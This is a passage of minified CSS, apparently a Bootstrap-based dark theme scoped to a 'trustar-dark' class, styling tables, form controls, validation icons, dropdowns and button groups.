.table-brand-primary,.trustar-dark .table-brand-primary>th,.trustar-dark .table-brand-primary>td{background-color:#c6d5f3}.trustar-dark .table-brand-primary th,.trustar-dark .table-brand-primary td,.trustar-dark .table-brand-primary thead th,.trustar-dark .table-brand-primary tbody+tbody{border-color:#96b0e9}.trustar-dark .table-hover .table-brand-primary:hover{background-color:#b1c5ef}.trustar-dark .table-hover .table-brand-primary:hover>td,.trustar-dark .table-hover .table-brand-primary:hover>th{background-color:#b1c5ef}.trustar-dark .table-brand-secondary,.trustar-dark .table-brand-secondary>th,.trustar-dark .table-brand-secondary>td{background-color:#ffe3d7}.trustar-dark .table-brand-secondary th,.trustar-dark .table-brand-secondary td,.trustar-dark .table-brand-secondary thead th,.trustar-dark .table-brand-secondary tbody+tbody{border-color:#ffcab4}.trustar-dark .table-hover .table-brand-secondary:hover{background-color:#ffd1be}.trustar-dark .table-hover .table-brand-secondary:hover>td,.trustar-dark .table-hover .table-brand-secondary:hover>th{background-color:#ffd1be}.trustar-dark .table-functional-success,.trustar-dark .table-functional-success>th,.trustar-dark .table-functional-success>td{background-color:#cad8b9}.trustar-dark .table-functional-success th,.trustar-dark .table-functional-success td,.trustar-dark .table-functional-success thead th,.trustar-dark .table-functional-success tbody+tbody{border-color:#9cb77d}.trustar-dark .table-hover .table-functional-success:hover{background-color:#becfa9}.trustar-dark .table-hover .table-functional-success:hover>td,.trustar-dark .table-hover .table-functional-success:hover>th{background-color:#becfa9}.trustar-dark .table-functional-info,.trustar-dark .table-functional-info>th,.trustar-dark .table-functional-info>td{background-color:#cce0f7}.trustar-dark .table-functional-info th,.trustar-dark .table-functional-info td,.trustar-dark .table-functional-info thead th,.trustar-dark .table-functional-info tbody+tbody{border-color:#a1c5f0}.trustar-dark .table-hover .table-functional-info:hover{background-color:#b6d3f4}.trustar-dark .table-hover .table-functional-info:hover>td,.trustar-dark .table-hover .table-functional-info:hover>th{background-color:#b6d3f4}.trustar-dark .table-functional-warning,.trustar-dark .table-functional-warning>th,.trustar-dark .table-functional-warning>td{background-color:#fce6c1}.trustar-dark .table-functional-warning th,.trustar-dark .table-functional-warning td,.trustar-dark .table-functional-warning thead th,.trustar-dark .table-functional-warning tbody+tbody{border-color:#fad18d}.trustar-dark .table-hover .table-functional-warning:hover{background-color:#fbdca9}.trustar-dark .table-hover .table-functional-warning:hover>td,.trustar-dark .table-hover .table-functional-warning:hover>th{background-color:#fbdca9}.trustar-dark .table-functional-danger,.trustar-dark .table-functional-danger>th,.trustar-dark .table-functional-danger>td{background-color:#f2b8bf}.trustar-dark .table-functional-danger th,.trustar-dark .table-functional-danger td,.trustar-dark .table-functional-danger thead th,.trustar-dark .table-functional-danger tbody+tbody{border-color:#e77b88}.trustar-dark .table-hover .table-functional-danger:hover{background-color:#eea2ac}.trustar-dark .table-hover .table-functional-danger:hover>td,.trustar-dark .table-hover .table-functional-danger:hover>th{background-color:#eea2ac}.trustar-dark .table-functional-accept,.trustar-dark .table-functional-accept>th,.trustar-dark .table-functional-accept>td{background-color:#fff}.trustar-dark .table-functional-accept th,.trustar-dark .table-functional-accept td,.trustar-dark .table-functional-accept thead th,.trustar-dark .table-functional-accept tbody+tbody{border-color:#fff}.trustar-dark .table-hover .table-functional-accept:hover{background-color:#f2f2f2}.trustar-dark .table-hover .table-functional-accept:hover>td,.trustar-dark .table-hover .table-functional-accept:hover>th{background-color:#f2f2f2}.trustar-dark .table-functional-decline,.trustar-dark .table-functional-decline>th,.trustar-dark .table-functional-decline>td{background-color:#fff}.trustar-dark .table-functional-decline th,.trustar-dark .table-functional-decline td,.trustar-dark .table-functional-decline thead th,.trustar-dark .table-functional-decline tbody+tbody{border-color:#fff}.trustar-dark .table-hover .table-functional-decline:hover{background-color:#f2f2f2}.trustar-dark .table-hover .table-functional-decline:hover>td,.trustar-dark .table-hover .table-functional-decline:hover>th{background-color:#f2f2f2}.trustar-dark .table-operational-critical,.trustar-dark .table-operational-critical>th,.trustar-dark .table-operational-critical>td{background-color:#fff}.trustar-dark .table-operational-critical th,.trustar-dark .table-operational-critical td,.trustar-dark .table-operational-critical thead th,.trustar-dark .table-operational-critical tbody+tbody{border-color:#fff}.trustar-dark .table-hover .table-operational-critical:hover{background-color:#f2f2f2}.trustar-dark .table-hover .table-operational-critical:hover>td,.trustar-dark .table-hover .table-operational-critical:hover>th{background-color:#f2f2f2}.trustar-dark .table-operational-error,.trustar-dark .table-operational-error>th,.trustar-dark .table-operational-error>td{background-color:#fff}.trustar-dark .table-operational-error th,.trustar-dark .table-operational-error td,.trustar-dark .table-operational-error thead th,.trustar-dark .table-operational-error tbody+tbody{border-color:#fff}.trustar-dark .table-hover .table-operational-error:hover{background-color:#f2f2f2}.trustar-dark .table-hover .table-operational-error:hover>td,.trustar-dark .table-hover .table-operational-error:hover>th{background-color:#f2f2f2}.trustar-dark .table-operational-warning,.trustar-dark .table-operational-warning>th,.trustar-dark .table-operational-warning>td{background-color:#fff}.trustar-dark .table-operational-warning th,.trustar-dark .table-operational-warning td,.trustar-dark .table-operational-warning thead th,.trustar-dark .table-operational-warning tbody+tbody{border-color:#fff}.trustar-dark .table-hover .table-operational-warning:hover{background-color:#f2f2f2}.trustar-dark .table-hover .table-operational-warning:hover>td,.trustar-dark .table-hover .table-operational-warning:hover>th{background-color:#f2f2f2}.trustar-dark .table-operational-info,.trustar-dark .table-operational-info>th,.trustar-dark .table-operational-info>td{background-color:#fff}.trustar-dark .table-operational-info th,.trustar-dark .table-operational-info td,.trustar-dark .table-operational-info thead th,.trustar-dark .table-operational-info tbody+tbody{border-color:#fff}.trustar-dark .table-hover .table-operational-info:hover{background-color:#f2f2f2}.trustar-dark .table-hover .table-operational-info:hover>td,.trustar-dark .table-hover .table-operational-info:hover>th{background-color:#f2f2f2}.trustar-dark .table-active,.trustar-dark .table-active>th,.trustar-dark .table-active>td{background-color:rgba(0,0,0,0.075)}.trustar-dark .table-hover .table-active:hover{background-color:rgba(0,0,0,0.075)}.trustar-dark .table-hover .table-active:hover>td,.trustar-dark .table-hover .table-active:hover>th{background-color:rgba(0,0,0,0.075)}.trustar-dark .table .thead-dark th{color:#fff;background-color:#212529;border-color:#32383e}.trustar-dark .table .thead-light th{color:#495057;background-color:#e9ecef;border-color:#dee2e6}.trustar-dark .table-dark{color:#fff;background-color:#212529}.trustar-dark .table-dark th,.trustar-dark .table-dark td,.trustar-dark .table-dark thead th{border-color:#32383e}.trustar-dark .table-dark.table-bordered{border:0}.trustar-dark .table-dark.table-striped tbody tr:nth-of-type(odd){background-color:rgba(255,255,255,0.05)}.trustar-dark .table-dark.table-hover tbody tr:hover{background-color:rgba(255,255,255,0.075)}@media (max-width: 575.98px){.trustar-dark .table-responsive-sm{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar-dark .table-responsive-sm>.table-bordered{border:0}}@media (max-width: 767.98px){.trustar-dark .table-responsive-md{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar-dark .table-responsive-md>.table-bordered{border:0}}@media (max-width: 991.98px){.trustar-dark .table-responsive-lg{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar-dark .table-responsive-lg>.table-bordered{border:0}}@media (max-width: 1199.98px){.trustar-dark .table-responsive-xl{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar-dark .table-responsive-xl>.table-bordered{border:0}}.trustar-dark .table-responsive{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar-dark .table-responsive>.table-bordered{border:0}.trustar-dark .form-control{display:block;width:100%;height:calc(2.25rem + 2px);padding:.375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;background-clip:padding-box;border:1px solid #ced4da;border-radius:.25rem;transition:border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .form-control{transition:none}}.trustar-dark .form-control::-ms-expand{background-color:transparent;border:0}.trustar-dark .form-control:focus{color:#495057;background-color:#fff;border-color:#80bdff;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .form-control::-webkit-input-placeholder{color:#6c757d;opacity:1}.trustar-dark .form-control:-ms-input-placeholder{color:#6c757d;opacity:1}.trustar-dark .form-control::-ms-input-placeholder{color:#6c757d;opacity:1}.trustar-dark .form-control::placeholder{color:#6c757d;opacity:1}.trustar-dark .form-control:disabled,.trustar-dark .form-control[readonly]{background-color:#e9ecef;opacity:1}.trustar-dark select.form-control:focus::-ms-value{color:#495057;background-color:#fff}.trustar-dark .form-control-file,.trustar-dark .form-control-range{display:block;width:100%}.trustar-dark .col-form-label{padding-top:calc(.375rem + 1px);padding-bottom:calc(.375rem + 1px);margin-bottom:0;font-size:inherit;line-height:1.5}.trustar-dark .col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px);font-size:1.25rem;line-height:1.5}.trustar-dark .col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.875rem;line-height:1.5}.trustar-dark .form-control-plaintext{display:block;width:100%;padding-top:.375rem;padding-bottom:.375rem;margin-bottom:0;line-height:1.5;color:#212529;background-color:transparent;border:solid transparent;border-width:1px 0}.trustar-dark .form-control-plaintext.form-control-sm,.trustar-dark .form-control-plaintext.form-control-lg{padding-right:0;padding-left:0}.trustar-dark .form-control-sm{height:calc(1.8125rem + 2px);padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.trustar-dark .form-control-lg{height:calc(2.875rem + 2px);padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.trustar-dark select.form-control[size],.trustar-dark select.form-control[multiple]{height:auto}.trustar-dark textarea.form-control{height:auto}.trustar-dark .form-group{margin-bottom:1rem}.trustar-dark .form-text{display:block;margin-top:.25rem}.trustar-dark .form-row{display:flex;flex-wrap:wrap;margin-right:-5px;margin-left:-5px}.trustar-dark .form-row>.col,.trustar-dark .form-row>[class*=\"col-\"]{padding-right:5px;padding-left:5px}.trustar-dark .form-check{position:relative;display:block;padding-left:1.25rem}.trustar-dark .form-check-input{position:absolute;margin-top:.3rem;margin-left:-1.25rem}.trustar-dark .form-check-input:disabled ~ .form-check-label{color:#6c757d}.trustar-dark .form-check-label{margin-bottom:0}.trustar-dark .form-check-inline{display:inline-flex;align-items:center;padding-left:0;margin-right:.75rem}.trustar-dark .form-check-inline .form-check-input{position:static;margin-top:0;margin-right:.3125rem;margin-left:0}.trustar-dark .valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:80%;color:#28a745}.trustar-dark .valid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;line-height:1.5;color:#fff;background-color:rgba(40,167,69,0.9);border-radius:.25rem}.was-validated .trustar-dark .form-control:valid,.trustar-dark .form-control.is-valid{border-color:#28a745;padding-right:2.25rem;background-repeat:no-repeat;background-position:center right calc(2.25rem / 4);background-size:calc(2.25rem / 2) calc(2.25rem / 2);background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e\")}.was-validated .trustar-dark .form-control:valid:focus,.trustar-dark .form-control.is-valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.was-validated .trustar-dark .form-control:valid ~ .valid-feedback,.was-validated .trustar-dark .form-control:valid ~ .valid-tooltip,.trustar-dark .form-control.is-valid ~ .valid-feedback,.trustar-dark .form-control.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar-dark textarea.form-control:valid,.trustar-dark textarea.form-control.is-valid{padding-right:2.25rem;background-position:top calc(2.25rem / 4) right calc(2.25rem / 4)}.was-validated .trustar-dark .custom-select:valid,.trustar-dark .custom-select.is-valid{border-color:#28a745;padding-right:3.4375rem;background:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e\") no-repeat right .75rem center/8px 10px,url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e\") no-repeat center right 1.75rem/1.125rem 1.125rem}.was-validated .trustar-dark .custom-select:valid:focus,.trustar-dark .custom-select.is-valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.was-validated .trustar-dark .custom-select:valid ~ .valid-feedback,.was-validated .trustar-dark .custom-select:valid ~ .valid-tooltip,.trustar-dark .custom-select.is-valid ~ .valid-feedback,.trustar-dark .custom-select.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar-dark .form-control-file:valid ~ .valid-feedback,.was-validated .trustar-dark .form-control-file:valid ~ .valid-tooltip,.trustar-dark .form-control-file.is-valid ~ .valid-feedback,.trustar-dark .form-control-file.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar-dark .form-check-input:valid ~ .form-check-label,.trustar-dark .form-check-input.is-valid ~ .form-check-label{color:#28a745}.was-validated .trustar-dark .form-check-input:valid ~ .valid-feedback,.was-validated .trustar-dark .form-check-input:valid ~ .valid-tooltip,.trustar-dark .form-check-input.is-valid ~ .valid-feedback,.trustar-dark .form-check-input.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar-dark .custom-control-input:valid ~ .custom-control-label,.trustar-dark .custom-control-input.is-valid ~ .custom-control-label{color:#28a745}.was-validated .trustar-dark .custom-control-input:valid ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-valid ~ .custom-control-label::before{border-color:#28a745}.was-validated .trustar-dark .custom-control-input:valid ~ .valid-feedback,.was-validated .trustar-dark .custom-control-input:valid ~ .valid-tooltip,.trustar-dark .custom-control-input.is-valid ~ .valid-feedback,.trustar-dark .custom-control-input.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar-dark .custom-control-input:valid:checked ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-valid:checked ~ .custom-control-label::before{border-color:#34ce57;background-color:#34ce57}.was-validated .trustar-dark .custom-control-input:valid:focus ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-valid:focus ~ .custom-control-label::before{box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.was-validated .trustar-dark .custom-control-input:valid:focus:not(:checked) ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-valid:focus:not(:checked) ~ .custom-control-label::before{border-color:#28a745}.was-validated .trustar-dark .custom-file-input:valid ~ .custom-file-label,.trustar-dark .custom-file-input.is-valid ~ .custom-file-label{border-color:#28a745}.was-validated .trustar-dark .custom-file-input:valid ~ .valid-feedback,.was-validated .trustar-dark .custom-file-input:valid ~ .valid-tooltip,.trustar-dark .custom-file-input.is-valid ~ .valid-feedback,.trustar-dark .custom-file-input.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar-dark .custom-file-input:valid:focus ~ .custom-file-label,.trustar-dark .custom-file-input.is-valid:focus ~ .custom-file-label{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.trustar-dark .invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:80%;color:#dc3545}.trustar-dark .invalid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;line-height:1.5;color:#fff;background-color:rgba(220,53,69,0.9);border-radius:.25rem}.was-validated .trustar-dark .form-control:invalid,.trustar-dark .form-control.is-invalid{border-color:#dc3545;padding-right:2.25rem;background-repeat:no-repeat;background-position:center right calc(2.25rem / 4);background-size:calc(2.25rem / 2) calc(2.25rem / 2);background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23dc3545' viewBox='-2 -2 7 7'%3e%3cpath stroke='%23d9534f' d='M0 0l3 3m0-3L0 3'/%3e%3ccircle r='.5'/%3e%3ccircle cx='3' r='.5'/%3e%3ccircle cy='3' r='.5'/%3e%3ccircle cx='3' cy='3' r='.5'/%3e%3c/svg%3E\")}.was-validated .trustar-dark .form-control:invalid:focus,.trustar-dark .form-control.is-invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.was-validated .trustar-dark .form-control:invalid ~ .invalid-feedback,.was-validated .trustar-dark .form-control:invalid ~ .invalid-tooltip,.trustar-dark .form-control.is-invalid ~ .invalid-feedback,.trustar-dark .form-control.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar-dark textarea.form-control:invalid,.trustar-dark textarea.form-control.is-invalid{padding-right:2.25rem;background-position:top calc(2.25rem / 4) right calc(2.25rem / 4)}.was-validated .trustar-dark .custom-select:invalid,.trustar-dark .custom-select.is-invalid{border-color:#dc3545;padding-right:3.4375rem;background:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e\") no-repeat right .75rem center/8px 10px,url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23dc3545' viewBox='-2 -2 7 7'%3e%3cpath stroke='%23d9534f' d='M0 0l3 3m0-3L0 3'/%3e%3ccircle r='.5'/%3e%3ccircle cx='3' r='.5'/%3e%3ccircle cy='3' r='.5'/%3e%3ccircle cx='3' cy='3' r='.5'/%3e%3c/svg%3E\") no-repeat center right 1.75rem/1.125rem 1.125rem}.was-validated .trustar-dark .custom-select:invalid:focus,.trustar-dark .custom-select.is-invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.was-validated .trustar-dark .custom-select:invalid ~ .invalid-feedback,.was-validated .trustar-dark .custom-select:invalid ~ .invalid-tooltip,.trustar-dark .custom-select.is-invalid ~ .invalid-feedback,.trustar-dark .custom-select.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar-dark .form-control-file:invalid ~ .invalid-feedback,.was-validated .trustar-dark .form-control-file:invalid ~ .invalid-tooltip,.trustar-dark .form-control-file.is-invalid ~ .invalid-feedback,.trustar-dark .form-control-file.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar-dark .form-check-input:invalid ~ .form-check-label,.trustar-dark .form-check-input.is-invalid ~ .form-check-label{color:#dc3545}.was-validated .trustar-dark .form-check-input:invalid ~ .invalid-feedback,.was-validated .trustar-dark .form-check-input:invalid ~ .invalid-tooltip,.trustar-dark .form-check-input.is-invalid ~ .invalid-feedback,.trustar-dark .form-check-input.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar-dark .custom-control-input:invalid ~ .custom-control-label,.trustar-dark .custom-control-input.is-invalid ~ .custom-control-label{color:#dc3545}.was-validated .trustar-dark .custom-control-input:invalid ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-invalid ~ .custom-control-label::before{border-color:#dc3545}.was-validated .trustar-dark .custom-control-input:invalid ~ .invalid-feedback,.was-validated .trustar-dark .custom-control-input:invalid ~ .invalid-tooltip,.trustar-dark .custom-control-input.is-invalid ~ .invalid-feedback,.trustar-dark .custom-control-input.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar-dark .custom-control-input:invalid:checked ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-invalid:checked ~ .custom-control-label::before{border-color:#e4606d;background-color:#e4606d}.was-validated .trustar-dark .custom-control-input:invalid:focus ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-invalid:focus ~ .custom-control-label::before{box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.was-validated .trustar-dark .custom-control-input:invalid:focus:not(:checked) ~ .custom-control-label::before,.trustar-dark .custom-control-input.is-invalid:focus:not(:checked) ~ .custom-control-label::before{border-color:#dc3545}.was-validated .trustar-dark .custom-file-input:invalid ~ .custom-file-label,.trustar-dark .custom-file-input.is-invalid ~ .custom-file-label{border-color:#dc3545}.was-validated .trustar-dark .custom-file-input:invalid ~ .invalid-feedback,.was-validated .trustar-dark .custom-file-input:invalid ~ .invalid-tooltip,.trustar-dark .custom-file-input.is-invalid ~ .invalid-feedback,.trustar-dark .custom-file-input.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar-dark .custom-file-input:invalid:focus ~ .custom-file-label,.trustar-dark .custom-file-input.is-invalid:focus ~ .custom-file-label{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.trustar-dark .form-inline{display:flex;flex-flow:row wrap;align-items:center}.trustar-dark .form-inline .form-check{width:100%}@media (min-width: 576px){.trustar-dark .form-inline label{display:flex;align-items:center;justify-content:center;margin-bottom:0}.trustar-dark .form-inline .form-group{display:flex;flex:0 0 auto;flex-flow:row wrap;align-items:center;margin-bottom:0}.trustar-dark .form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.trustar-dark .form-inline .form-control-plaintext{display:inline-block}.trustar-dark .form-inline .input-group,.trustar-dark .form-inline .custom-select{width:auto}.trustar-dark .form-inline .form-check{display:flex;align-items:center;justify-content:center;width:auto;padding-left:0}.trustar-dark .form-inline .form-check-input{position:relative;margin-top:0;margin-right:.25rem;margin-left:0}.trustar-dark .form-inline .custom-control{align-items:center;justify-content:center}.trustar-dark .form-inline .custom-control-label{margin-bottom:0}}.trustar-dark .fade{transition:opacity 0.15s linear}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .fade{transition:none}}.trustar-dark .fade:not(.show){opacity:0}.trustar-dark .collapse:not(.show){display:none}.trustar-dark .collapsing{position:relative;height:0;overflow:hidden;transition:height 0.35s ease}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .collapsing{transition:none}}.trustar-dark .dropup,.trustar-dark .dropright,.trustar-dark .dropdown,.trustar-dark .dropleft{position:relative}.trustar-dark .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\";border-top:.3em solid;border-right:.3em solid transparent;border-bottom:0;border-left:.3em solid transparent}.trustar-dark .dropdown-toggle:empty::after{margin-left:0}.trustar-dark .dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:10rem;padding:.5rem 0;margin:.125rem 0 0;font-size:1rem;color:#212529;text-align:left;list-style:none;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,0.15);border-radius:.25rem}.trustar-dark .dropdown-menu-right{right:0;left:auto}@media (min-width: 576px){.trustar-dark .dropdown-menu-sm-right{right:0;left:auto}}@media (min-width: 768px){.trustar-dark .dropdown-menu-md-right{right:0;left:auto}}@media (min-width: 992px){.trustar-dark .dropdown-menu-lg-right{right:0;left:auto}}@media (min-width: 1200px){.trustar-dark .dropdown-menu-xl-right{right:0;left:auto}}.trustar-dark .dropdown-menu-left{right:auto;left:0}@media (min-width: 576px){.trustar-dark .dropdown-menu-sm-left{right:auto;left:0}}@media (min-width: 768px){.trustar-dark .dropdown-menu-md-left{right:auto;left:0}}@media (min-width: 992px){.trustar-dark .dropdown-menu-lg-left{right:auto;left:0}}@media (min-width: 1200px){.trustar-dark .dropdown-menu-xl-left{right:auto;left:0}}.trustar-dark .dropup .dropdown-menu{top:auto;bottom:100%;margin-top:0;margin-bottom:.125rem}.trustar-dark .dropup .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\";border-top:0;border-right:.3em solid transparent;border-bottom:.3em solid;border-left:.3em solid transparent}.trustar-dark .dropup .dropdown-toggle:empty::after{margin-left:0}.trustar-dark .dropright .dropdown-menu{top:0;right:auto;left:100%;margin-top:0;margin-left:.125rem}.trustar-dark .dropright .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\";border-top:.3em solid transparent;border-right:0;border-bottom:.3em solid transparent;border-left:.3em solid}.trustar-dark .dropright .dropdown-toggle:empty::after{margin-left:0}.trustar-dark .dropright .dropdown-toggle::after{vertical-align:0}.trustar-dark .dropleft .dropdown-menu{top:0;right:100%;left:auto;margin-top:0;margin-right:.125rem}.trustar-dark .dropleft .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\"}.trustar-dark .dropleft .dropdown-toggle::after{display:none}.trustar-dark .dropleft .dropdown-toggle::before{display:inline-block;margin-right:.255em;vertical-align:.255em;content:\"\";border-top:.3em solid transparent;border-right:.3em solid;border-bottom:.3em solid transparent}.trustar-dark .dropleft .dropdown-toggle:empty::after{margin-left:0}.trustar-dark .dropleft .dropdown-toggle::before{vertical-align:0}.trustar-dark .dropdown-menu[x-placement^=\"top\"],.trustar-dark .dropdown-menu[x-placement^=\"right\"],.trustar-dark .dropdown-menu[x-placement^=\"bottom\"],.trustar-dark .dropdown-menu[x-placement^=\"left\"]{right:auto;bottom:auto}.trustar-dark .dropdown-divider{height:0;margin:.5rem 0;overflow:hidden;border-top:1px solid #e9ecef}.trustar-dark .dropdown-item{display:block;width:100%;padding:.25rem 1.5rem;clear:both;font-weight:400;color:#212529;text-align:inherit;white-space:nowrap;background-color:transparent;border:0}.trustar-dark .dropdown-item:first-child{border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.trustar-dark .dropdown-item:last-child{border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.trustar-dark .dropdown-item:hover,.trustar-dark .dropdown-item:focus{color:#16181b;text-decoration:none;background-color:#f8f9fa}.trustar-dark .dropdown-item.active,.trustar-dark .dropdown-item:active{color:#fff;text-decoration:none;background-color:#007bff}.trustar-dark .dropdown-item.disabled,.trustar-dark .dropdown-item:disabled{color:#6c757d;pointer-events:none;background-color:transparent}.trustar-dark .dropdown-menu.show{display:block}.trustar-dark .dropdown-header{display:block;padding:.5rem 1.5rem;margin-bottom:0;font-size:.875rem;color:#6c757d;white-space:nowrap}.trustar-dark .dropdown-item-text{display:block;padding:.25rem 1.5rem;color:#212529}.trustar-dark .btn-group,.trustar-dark .btn-group-vertical{position:relative;display:inline-flex;vertical-align:middle}.trustar-dark .btn-group>.btn,.trustar-dark .btn-group-vertical>.btn{position:relative;flex:1 1 auto}.trustar-dark .btn-group>.btn:hover,.trustar-dark .btn-group-vertical>.btn:hover{z-index:1}.trustar-dark .btn-group>.btn:focus,.trustar-dark .btn-group>.btn:active,.trustar-dark .btn-group>.btn.active,.trustar-dark .btn-group-vertical>.btn:focus,.trustar-dark .btn-group-vertical>.btn:active,.trustar-dark .btn-group-vertical>.btn.active{z-index:1}.trustar-dark .btn-toolbar{display:flex;flex-wrap:wrap;justify-content:flex-start}.trustar-dark .btn-toolbar .input-group{width:auto}.trustar-dark .btn-group>.btn:not(:first-child),.trustar-dark .btn-group>.btn-group:not(:first-child){margin-left:-1px}.trustar-dark .btn-group>.btn:not(:last-child):not(.dropdown-toggle),.trustar-dark .btn-group>.btn-group:not(:last-child)>.btn{border-top-right-radius:0;border-bottom-right-radius:0}.trustar-dark .btn-group>.btn:not(:first-child),.trustar-dark .btn-group>.btn-group:not(:first-child)>.btn{border-top-left-radius:0;border-bottom-left-radius:0}.trustar-dark .dropdown-toggle-split{padding-right:.5625rem;padding-left:.5625rem}.trustar-dark .dropdown-toggle-split::after,.dropup .trustar-dark .dropdown-toggle-split::after,.dropright .trustar-dark .dropdown-toggle-split::after{margin-left:0}.dropleft .trustar-dark .dropdown-toggle-split::before{margin-right:0}.trustar-dark .btn-sm+.dropdown-toggle-split,.trustar-dark .btn-group-sm>.btn+.dropdown-toggle-split{padding-right:.375rem;padding-left:.375rem}.trustar-dark .btn-lg+.dropdown-toggle-split,.trustar-dark .btn-group-lg>.btn+.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.trustar-dark .btn-group-vertical{flex-direction:column;align-items:flex-start;justify-content:center}.trustar-dark .btn-group-vertical>.btn,.trustar-dark .btn-group-vertical>.btn-group{width:100%}.trustar-dark .btn-group-vertical>.btn:not(:first-child),.trustar-dark .btn-group-vertical>.btn-group:not(:first-child){margin-top:-1px}.trustar-dark .btn-group-vertical>.btn:not(:last-child):not(.dropdown-toggle),.trustar-dark .btn-group-vertical>.btn-group:not(:last-child)>.btn{border-bottom-right-radius:0;border-bottom-left-radius:0}.trustar-dark .btn-group-vertical>.btn:not(:first-child),.trustar-dark .btn-group-vertical>.btn-group:not(:first-child)>.btn{border-top-left-radius:0;border-top-right-radius:0}.trustar-dark .btn-group-toggle>.btn,.trustar-dark .btn-group-toggle>.btn-group>.btn{margin-bottom:0}.trustar-dark .btn-group-toggle>.btn input[type=\"radio\"],.trustar-dark .btn-group-toggle>.btn input[type=\"checkbox\"],.trustar-dark .btn-group-toggle>.btn-group>.btn input[type=\"radio\"],.trustar-dark .btn-group-toggle>.btn-group>.btn input[type=\"checkbox\"]{position:absolute;clip:rect(0, 0, 0, 0);pointer-events:none}.trustar-dark .input-group{position:relative;display:flex;flex-wrap:wrap;align-items:stretch;width:100%}.trustar-dark .input-group>.form-control,.trustar-dark .input-group>.form-control-plaintext,.trustar-dark 